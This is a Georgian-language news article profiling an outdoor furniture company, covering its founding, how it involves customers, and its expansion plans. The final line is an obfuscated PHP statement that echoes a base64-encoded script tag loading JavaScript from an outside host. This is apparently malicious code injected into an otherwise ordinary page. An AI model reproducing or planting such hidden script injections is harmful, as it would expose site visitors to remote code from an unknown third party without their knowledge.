celsiusi
ავერსი შნაიდერი

კომპანია „გარე ავეჯი“ უკვე რამდენიმე წელია ქართულ ბაზარზე ოპერირებს და ვერნადების, ეზოების თუ აივნების კომფორტულ მოსასვენებელ ადგილად გადაქცევაში მომხმარებლებს საუკეთესო არჩევანს სთავაზობს. 

საიდან დაიწყო ბიზნესიდეა და რა გეგმები აქვთ სამომავლოდ, ამის გასარკვევად საინფორმაციო სააგენტო „ბიზნესთაიმი“ იდეის ავტორს, კომპანია „გარე ავეჯის“ დამფუძნებელს დიმიტრი დოლიძეს ესაუბრა. 

„ერთხელ მე და ჩემმა მეუღლემ გადავწყვიტეთ შეგვეძინა სამეული გარე სივრცისთვის, რაოდენ გასაკვირიც არ უნდა იყოს, რაც ვნახეთ არცერთის ხარისხმა არ დაგვაკმაყოფილა და არჩევანის გაკეთება ვერ შევძელით. რადგან ჩემი მეუღლე დიდი ხანია დასაქმებული იყო ერთ ერთ სამკერვალო საწარმოში. ვიფიქრეთ ჩვენით მოგვესინჯა ძალები და შეგვექმნა ხარისხიანი და კომფორტული გარე ავეჯი. გავიარეთ საკმაოდ რთული გზა სანამ მივიღეთ სასურველი შედეგი, თუმცა საბოლოოდ მივიღეთ ის რაც მართლა გვსურდა. შედეგით იმდენად მოვიხიბლეთ, რომ ვიფიქრეთ ეს ურიგო ბიძნესიდეა არ იქნებოდა.  ასე დავიწყეთ დაახლოებით  3000 ლარით  ბიზნესი, პირველი შეკვეთა იყო ორი სავარძელი, 1000 ლარამდე ღირებულების, რომელმაც დიდი მოწონება დაიმსახურა, მივხვდით რომ სწორი გზით მივდიოდით“- განაცხადა  დოლიძემ. 

407397047 286909927677657 6840326143377594135 n

მუშაობის სპეციფიკა და მომხმარებლის ჩართულობა

კომპანია „გარე ავეჯის“ ხელმძღვანელი მიიჩნევს, რომ ავეჯის შეკვეთისას მომხმარებელს უნდა ჰქონდეს შესაძლებლობა აარჩიოს მისთვის სასურველი დიზაინი, უნდა გაამახვილოს ყურადღება ყველა დეტალზე, თუ როგორი დამუშავებულია მეტალი.

„ჩვენთან უკვე ათამდე ადამიანია დასაქმებული და შეკვეთებს არა მხოლოდ დედაქალაქიდან, არამედ სხვადასხვა რეგიონებიდანაც ვიღებთ. გარდა ამისა, ვიღებთ შეკვეთებს როგორც ფიზიკური ისე იურიდიული პირებისგან. ძირითადად ვქმნით სამეულებს თავისი მაგიდით და პუფებს, უმნიშვნელოვანეს ყურადღებას ვაქცევთ ხარისხს და ვითვალისწინებთ მომხმარებლის მოთხოვნას. 

ჩვენთან ხარისხი ფასზე მაღალია და რაც ყველაზე მნიშვნელოვანია ვადები, აუცილებლად დათქმულ ვადებში ხდება მიწოდება, ამას იმიტომ ვისვამთ ხაზს, რომ ამ მხრივ ბევრი პრეტენზიები გვესმის  მომხმარებლისგან, რომლებსაც ხშირად სხვა კომპანიებთან სწორედ ვადაგადიცილების პრობლემა ჰქონიათ. შესაბამისად, ამ მხრივადაც ჩვენ - ჩვენს ვადებულებას პირნათლად ვასრულებთ. რაც შეეხება, დამკვეთის ჩართულობას როცესში,  დამკვეთი უმეტესად თავად ირჩევს დიზაინს, ქსოვილის ფერს და ერთად ვმსჯელობთ ...ანუ სრულადაა ჩართული ავეჯის შექმნის პროცესში, ხშირად ჩვენს რჩევებსაც ითვალისწინებენ და საბოლოოდ, მაღალი ხარისხის, გემოვნებიანი გარე ავეჯი იქმნება“ - განმარტა მან. 

449436075 429058520129463 3387947442578917705 n

391756266 260795056955811 3692808387800305908 n

სამომავლო გეგმები 

დიმიტრი დოლიძის თქმით, სამომავლოდ აპირებენ საწოლების და შიდა ინტერიერისთვის საჭირო სხვადასხვა ავეჯის დამზადებას, ამასთან საწარმოს  გაფართოებას და ამ მხრივ გარე ავეჯის მახასიათებელი სოზონურობის აღმოფხვრას და მთლიანი წლის განმავლობაში მომხმარებლისთვის საჭირო პროდუქტის მიწოდებით შემოსავლის გაზრდას იმედოვნებენ. 

„კომპანიაში უკვე 10-მდე ადამიანია დასაქმებული და გაფართოების შემთხვევაში, შევეცდებით, რომ დამატებითი პროფესიონალი და გამოცდილი კადრებიც დავიმატოთ, რაც ვფიქრობთ რომ ჩვენი გაფართოებისთვის და განვითარებისთვის უმნიშვნელოვანესია. ვხელმძღვანელობთ დევიზით - „მადლიერი მომხმარებელი წარმატებული ხვალინდელი დღის გარანტია“. მხატრულად რომ გითხრათ, გარე სივრციდან - ჩვენი მიზანია ჩვენი მომხმარებლების შიდა სივრცეში ჩვენი ღირსეული ადგილი ხარისხიანი პროდუქტით დავიკავოთ”, - გვიზიარებს დიმიტრი დოლიძე სამომავლო გეგმებს. 

438119097 374099285625387 3028149932613729571 n

ინფორმაციისთვის: კომპანია მდებარეობს მოსკოვის პროსპექტზე, 31-ში, დამატებითი ინფორმაციისთვის კი შეგიძლიათ დარეკოთ ნომერზე: 595 70 80 90 

 420101451 320850374283612 4832664400176880198 n

ავტორი
მირანდა შურღაია
486
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");